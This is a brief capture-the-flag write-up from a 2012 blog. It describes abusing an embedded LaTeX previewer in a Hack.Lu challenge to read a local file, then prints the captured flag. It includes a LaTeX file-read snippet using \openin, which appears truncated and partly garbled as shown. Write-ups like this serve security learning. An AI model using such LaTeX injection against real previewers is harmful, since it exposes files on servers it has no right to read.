## Friday, October 26, 2012

### Hack.Lu CTF: it's not scientific without LaTeX Writeup

The objective of this challenge was to leverage an embedded LaTeX previewer to access a local file.

Having very little experience with LaTeX, I googled around for a bit and stumbled on this paper: LaTeX Hacking

The paper describes how LaTeX previewers often make a system vulnerable because they are allowed to read and print local files as so (note the \hfill to make the line wrap):
\openin5=/home/awesker/cure
\ifeof5 \let\next=\relax
\else \curline˜\\
\fi
\next}%
\fi

The font was fairly small, so I also included the following above the loop to make the flag readable:
\fontsize{20}{15}
\selectfont

Yay! The flag was embedded in the document now!

Flag = gtttatgtagcttaccccctcaaagcaatacactgaaaatgtttcgacgggtttacatcaccccataaacaaacaggtttggtcctagcctttctattag

-- d1r3w0lf